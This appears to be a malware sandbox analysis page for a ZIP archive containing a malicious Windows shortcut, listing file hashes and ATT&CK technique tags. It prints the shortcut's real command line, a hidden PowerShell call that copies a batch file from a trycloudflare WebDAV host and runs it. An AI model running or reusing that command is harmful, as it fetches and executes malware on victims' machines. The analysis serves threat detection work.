Malicious
Malicious

faa07de0cff3dcc6655b76d879b2585c6908f7[...]ece.zip

ZIP Archive
|
MD5: 1e73e75482f1e0c01ffa49154a84143a
|
Size: 1.38 KB
|
application/zip

Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules5
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
1e73e75482f1e0c01ffa49154a84143a
Sha1
b2e5e4abc6ce89b72a9bbd2c96ca71561daa8516
Sha256
413b5516a370863bdd5d2e05d5b7b75592014533e9582afbd821ecd037445ef8
Sha384
e35519ef829ef2bb9f91039407ef11445cc314213038b3706b9750046dc9266a27cc33ffd9a459b1ba12c7c57a9a6cef
Sha512
59b68ed770026ae129236f4fd655367641eb54ee542ad0a72dd8c26b7c6b9cecff97bb7a8d3e1f45bca808f97a10e3a560a72f5b6a1fd0dba396f4844e841224
SSDeep
24:Sdo4LOBK8VwbS6jfNtYU9FeRfRoHc42KwtnyijDWkNQvQf1h4do4LOw:A/LOBK82b3DNmWsxRokKwgQDbNQvQNUh
TLSH
1521B6A2569E4808C112AC7216AB675ACE232B7EAC7AE0356588927418524E28CEC85A
File Structure
faa07de0cff3dcc6655b76d879b2585c6908f72d77b03bed64d0dcb5297e2ece.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
faa07de0cff3dcc6655b76d879b2585c6908f72d77b03bed64d0dcb5297e2ece.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Powershell: Hidden Execution
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -w hidden -c "Copy-Item '\\louise-monitors-mo-rating.trycloudflare.com@SSL\DavWWWRoot\bas.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\bas.bat\" -WindowStyle Hidden"
faa07de0cff3dcc6655b76d879b2585c6908f72d77b03bed64d0dcb5297e2ece.zip (1.38 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙